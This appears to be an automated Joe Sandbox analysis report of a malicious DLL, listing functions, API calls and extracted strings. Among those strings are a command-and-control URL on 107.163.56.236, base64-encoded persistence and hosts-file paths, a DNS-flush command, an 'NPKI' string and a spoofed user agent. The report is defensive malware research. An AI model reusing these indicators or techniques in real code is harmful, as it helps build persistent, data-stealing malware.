                                                                                                                                        • Part of subcall function 100040D4: RegSetValueExA.KERNEL32(00000001,?,00000001,00000000,?,?,?,10006DB3,?,wfl,00000000,00000001,?,00000001,?), ref: 100040E9
                                                                                                                                        • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10006DBE,?), ref: 10004096
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
                                                                                                                                      • String ID: %s "%s",WriteErrorLog$C:\Users\user\Desktop\4hSuRTwnWJ.dll$C:\Windows\SysWOW64\rundll32.exe$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$wfl
                                                                                                                                      • API String ID: 1762869224-438663075
                                                                                                                                      • Opcode ID: 6587b3fcbeba13a0e0dd17d5143bb6b91a24dcf6a420a326e4fd5a7b874dc724
                                                                                                                                      • Instruction ID: 3647a5429755ecec446a2f8ccc26c264e58e26412829948a16bcfe0502dd19e7
                                                                                                                                      • Opcode Fuzzy Hash: 6587b3fcbeba13a0e0dd17d5143bb6b91a24dcf6a420a326e4fd5a7b874dc724
                                                                                                                                      • Instruction Fuzzy Hash: E21182B694421CBEFB11D7A4DC86FEB776CEB14354F1004A1F704B9086DAB16FD88AA4
                                                                                                                                      Function 10005DB4 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 109timeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • ___crtGetTimeFormatEx.LIBCMT ref: 10005E11
                                                                                                                                        • Part of subcall function 1000409D: RegQueryValueExA.KERNEL32(00000000,?,000F003F,00000000,?,80000002,?,10005E16,?,ProcessorNameString,00000000,00000004,?,?,80000002,?), ref: 100040B2
                                                                                                                                        • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10006DBE,?), ref: 10004096
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseFormatQueryTimeValue___crt
                                                                                                                                      • String ID: %u MB$11301248$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.236:18963/main.php
                                                                                                                                      • API String ID: 271660946-3098610844
                                                                                                                                      • Opcode ID: 8ff5936d64327294c20ebb94e6830e3fc8db000cd3061d3d2f22a48a78437dde
                                                                                                                                      • Instruction ID: abc6f20b1ce2cb917ff0de70ec6e798626a5ef384760a4d5e12c6da5aced1c49
                                                                                                                                      • Opcode Fuzzy Hash: 8ff5936d64327294c20ebb94e6830e3fc8db000cd3061d3d2f22a48a78437dde
                                                                                                                                      • Instruction Fuzzy Hash: 7431B27680421CBAFB21C764DC42FDF77BCEB08350F14406AF658BA182DB75BA458B55
                                                                                                                                      Function 10008007 Relevance: 12.2, APIs: 1, Strings: 7, Instructions: 195sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?), ref: 100081C7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID: %s\%s$.$107.163.56.236:18963/main.php$11301248$L2ltYWdlLnBocA==$NPKI$P
                                                                                                                                      • API String ID: 3472027048-625400124
                                                                                                                                      • Opcode ID: b20657bbd8bc9d8975f4e97b85a460ea5bdc233e1a061fa91c1cb6f77c7c645f
                                                                                                                                      • Instruction ID: 4c673a98c6441f9e31fc3cef50eeade01f4b091230a6ef8cf0bb00e993756c5f
                                                                                                                                      • Opcode Fuzzy Hash: b20657bbd8bc9d8975f4e97b85a460ea5bdc233e1a061fa91c1cb6f77c7c645f
                                                                                                                                      • Instruction Fuzzy Hash: EB517F76D04259AEEB11DBA4DC45FEAB7BCFF48240F1004E6E608E6041EB749B898F20
                                                                                                                                      Function 1000826C Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 145sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(?,00000000,00000000), ref: 10008394
                                                                                                                                      • wsprintfA.USER32 ref: 100083E6
                                                                                                                                      Strings
                                                                                                                                      • 8.8.8.8, xrefs: 100083EF
                                                                                                                                      • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008405
                                                                                                                                      • http://107.163.56.236:18963/main.php, xrefs: 10008353
                                                                                                                                      • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082C5
                                                                                                                                      • 127.0.0.1, xrefs: 100083F4
                                                                                                                                      • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082DC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleepwsprintf
                                                                                                                                      • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.236:18963/main.php
                                                                                                                                      • API String ID: 1749205058-3398374254
                                                                                                                                      • Opcode ID: d25869077e93faae0cae005a94cc7737dfc85bdbcdb25d0d5c8aa6b327e90085
                                                                                                                                      • Instruction ID: 599745a503878d8c2b4f4c943fee7f854f2ac9340d99916b44456f1581be1535
                                                                                                                                      • Opcode Fuzzy Hash: d25869077e93faae0cae005a94cc7737dfc85bdbcdb25d0d5c8aa6b327e90085
                                                                                                                                      • Instruction Fuzzy Hash: E141F6B6904358B6FB21D364CC46FCF77ACEB457C0F2400A5F248A9086DAB4AB844E51
                                                                                                                                      Function 10008567 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 82sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 1000857E
                                                                                                                                      • Sleep.KERNEL32(001B7740,?,?,80000002,00000000,00000000,000F003F,?), ref: 100085BF
                                                                                                                                      • wsprintfA.USER32 ref: 100085EC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep$wsprintf
                                                                                                                                      • String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log$wINsTA0\dEFauLT
                                                                                                                                      • API String ID: 3195947292-2583752392
                                                                                                                                      • Opcode ID: 426cec066d836a6d9531c2c22aee2d5bed6a128dd3e1840c730ea375743a0379
                                                                                                                                      • Instruction ID: 808b94570942930e2d590beba0ecc667b227be8161c7ec68916a02243465a7c8
                                                                                                                                      • Opcode Fuzzy Hash: 426cec066d836a6d9531c2c22aee2d5bed6a128dd3e1840c730ea375743a0379
                                                                                                                                      • Instruction Fuzzy Hash: 8121A176C0021CBAEB11DBE4CC42EDFBB7DFF48390F1400A6F604AA141DA726A458BA1
                                                                                                                                      Function 10006A6E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64sleepthreadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B50,00000000,00000000,?,?,00000202,?), ref: 10003EDA
                                                                                                                                      • GetLastError.KERNEL32 ref: 10006AA8
                                                                                                                                      • Sleep.KERNEL32(0002BF20), ref: 10006ADD
                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,1000687E,00000000,00000000,00000000), ref: 10006AF1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create$ErrorLastMutexSleepThread
                                                                                                                                      • String ID: 0x5d65r455f$5762479093
                                                                                                                                      • API String ID: 145085098-2446933972
                                                                                                                                      • Opcode ID: 1bf5ddc31a5fccf9d8316398cb60a97d273a570f9133d1d93a0f75ce2073ad48
                                                                                                                                      • Instruction ID: 325b642b3227e7783157f4dbf46b27218333242e6ebaac23ecbdbf3e0d4f9812
                                                                                                                                      • Opcode Fuzzy Hash: 1bf5ddc31a5fccf9d8316398cb60a97d273a570f9133d1d93a0f75ce2073ad48
                                                                                                                                      • Instruction Fuzzy Hash: 0A0145769442187EF211E3B09CC6CBF3A4DCB963E0F240039FA049A08BDA25AC1541B2
                                                                                                                                      Function 100087A8 Relevance: 7.5, APIs: 5, Instructions: 33sleepthreadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(000927C0), ref: 100087C5
                                                                                                                                      • CreateThread.KERNEL32(?,?,Function_00006A6E), ref: 100087D1
                                                                                                                                      • Sleep.KERNEL32(00001388,?,?,Function_00006A6E), ref: 100087D8
                                                                                                                                      • CreateThread.KERNEL32(?,?,1000841C), ref: 100087E4
                                                                                                                                      • Sleep.KERNEL32(000000FF), ref: 100087E8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep$CreateThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3220764680-0
                                                                                                                                      • Opcode ID: 8bbdc61587bd2035b7835bae4f699dea6d5c0fe2ba0605cc09711e4c1ca76acb
                                                                                                                                      • Instruction ID: 00369de283c3c4731b9d356d8220f188fdb6c223a1f57ae6751a2545bacebd6c
                                                                                                                                      • Opcode Fuzzy Hash: 8bbdc61587bd2035b7835bae4f699dea6d5c0fe2ba0605cc09711e4c1ca76acb
                                                                                                                                      • Instruction Fuzzy Hash: 6DE08CE864C39D3CB521F3B60CCAC6F1C0DEFC56E83260591F1551408AAEA4CE1089B2
                                                                                                                                      Function 100044AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 305 100044ad-100044ed call 1003672f call 1002acb8 GetExtendedUdpTable 310 100044f4-10004502 call 10026952 305->310 311 100044ef-100044f2 305->311 312 10004504-10004507 310->312 316 10004509-10004518 GetExtendedUdpTable 310->316 311->310 311->312 315 1000455f-10004563 312->315 317 1000451a-1000451c 316->317 318 1000451e-10004520 316->318 317->315 319 10004522 318->319 320 1000454b-10004551 call 10022ecb 318->320 322 10004525-1000453d call 10020ca8 319->322 320->315 326 1000453f 322->326 326->320
                                                                                                                                      APIs
                                                                                                                                      • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,iphlpapi.dll), ref: 100044E9
                                                                                                                                      • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,?,iphlpapi.dll), ref: 10004513
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExtendedTable
                                                                                                                                      • String ID: iphlpapi.dll
                                                                                                                                      • API String ID: 2407854163-3565520932
                                                                                                                                      • Opcode ID: 835a6843258e7208fd66cbb0b3d3078184e5314111180be55c0abbb59f160df6
                                                                                                                                      • Instruction ID: 31c38dff5c2f23d2e80d6729e65b49ea4d2fc3e0448d1b2d886b1c9a64a93342
                                                                                                                                      • Opcode Fuzzy Hash: 835a6843258e7208fd66cbb0b3d3078184e5314111180be55c0abbb59f160df6
                                                                                                                                      • Instruction Fuzzy Hash: 801138B5900604BFEB21DBB89C85DAF77ACEF812E4B610959F4609B083EA309E418764
                                                                                                                                      Function 10007101 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 95sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 354 10007101-10007119 call 1000cc9e 357 1000711b-10007160 call 10005c4c 354->357 360 10007162-10007169 357->360 361 1000716b 357->361 362 10007170-100071a4 call 10003ef4 call 1000ccec call 100061bd 360->362 361->362 369 100071a6-100071b2 Sleep 362->369 370 100071b7-100071bb 362->370 369->357 371 100071d9-100071e3 call 1000ccf2 370->371 372 100071bd-100071c7 370->372 371->369 378 100071e5-100071f5 call 1000cde2 371->378 374 100071c9-100071cd 372->374 375 100071cf 372->375 376 100071d3-100071d7 374->376 375->376 376->371 376->372 378->369 381 100071f7-1000720c wsprintfA call 1000570f 378->381 381->369
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • http://107.163.56.236:18963/main.php, xrefs: 1000716B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleepwsprintf
                                                                                                                                      • String ID: http://107.163.56.236:18963/main.php
                                                                                                                                      • API String ID: 1749205058-1032972673
                                                                                                                                      • Opcode ID: cc644b06934194b45467aba69300342ed9eea8e4f55acc09b680274335fa8cd1
                                                                                                                                      • Instruction ID: 1ba79d2727b5c25180057f3adbd512e667f29cc168e691cf54200206849dc897
                                                                                                                                      • Opcode Fuzzy Hash: cc644b06934194b45467aba69300342ed9eea8e4f55acc09b680274335fa8cd1
                                                                                                                                      • Instruction Fuzzy Hash: 302129B6D046557AF724D368CC56FCF37ACEF053D0F2000A6F608E50C6E679AE818A15
                                                                                                                                      Function 10006B1F Relevance: 4.5, APIs: 3, Instructions: 46sleepthreadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B50,00000000,00000000,?,?,00000202,?), ref: 10003EDA
                                                                                                                                      • GetLastError.KERNEL32 ref: 10006B55
                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,1000687E,?,00000000,00000000), ref: 10006B6B
                                                                                                                                      • Sleep.KERNEL32(00002710,000000FF), ref: 10006B88
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create$ErrorLastMutexSleepThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 145085098-0
                                                                                                                                      • Opcode ID: ac9528a17d6a473cc17636cf4f889bf608f047090b63bf6babc1a19c683e2e74
                                                                                                                                      • Instruction ID: 0dfad82b2f818e899c4efe6cf040158b6e9a95d026b592be600c13ad7a627ec0
                                                                                                                                      • Opcode Fuzzy Hash: ac9528a17d6a473cc17636cf4f889bf608f047090b63bf6babc1a19c683e2e74
                                                                                                                                      • Instruction Fuzzy Hash: E7F0C875805224BBF611E7659CCEDEF3A6DDF493E0F200124F91CD6186DB24AD4186F2
                                                                                                                                      Function 10008566 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 32sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 1000857E
                                                                                                                                      • Sleep.KERNEL32(001B7740,?,?,80000002,00000000,00000000,000F003F,?), ref: 100085BF
                                                                                                                                      • wsprintfA.USER32 ref: 100085EC
                                                                                                                                      Strings
                                                                                                                                      • aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=, xrefs: 10008580
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep$wsprintf
                                                                                                                                      • String ID: aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=
                                                                                                                                      • API String ID: 3195947292-1577701794
                                                                                                                                      • Opcode ID: 0d3aaa54b83110a6c39145af25a11d8a2cca2ba40997c6ce065f38ae87f1fe8e
                                                                                                                                      • Instruction ID: 2bed81543f1dfbe87c5afae835dc59a6df62d7b698700d53ee2b0c8158721675
                                                                                                                                      • Opcode Fuzzy Hash: 0d3aaa54b83110a6c39145af25a11d8a2cca2ba40997c6ce065f38ae87f1fe8e
                                                                                                                                      • Instruction Fuzzy Hash: 4BF0A035C0111CBAFB21EBF18C8AEDF7E69EF053D0F140064F50462245D7B21E408BA1
                                                                                                                                      Function 100061BD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83timeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                      • ___crtGetTimeFormatEx.LIBCMT ref: 10006201
                                                                                                                                      Strings
                                                                                                                                      • TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1, xrefs: 100061D0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FormatInternetOpenTime___crt
                                                                                                                                      • String ID: TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1
                                                                                                                                      • API String ID: 483802873-1756078650
                                                                                                                                      • Opcode ID: 90fcbfe0a639a0e884f456d6610786c003b4ab0d1f1519b9cd6cd1c14ce8f7c2
                                                                                                                                      • Instruction ID: f0c3526304c825564c5c4eb44b26f53dc373e74deb03e814873fed5b313e77ee
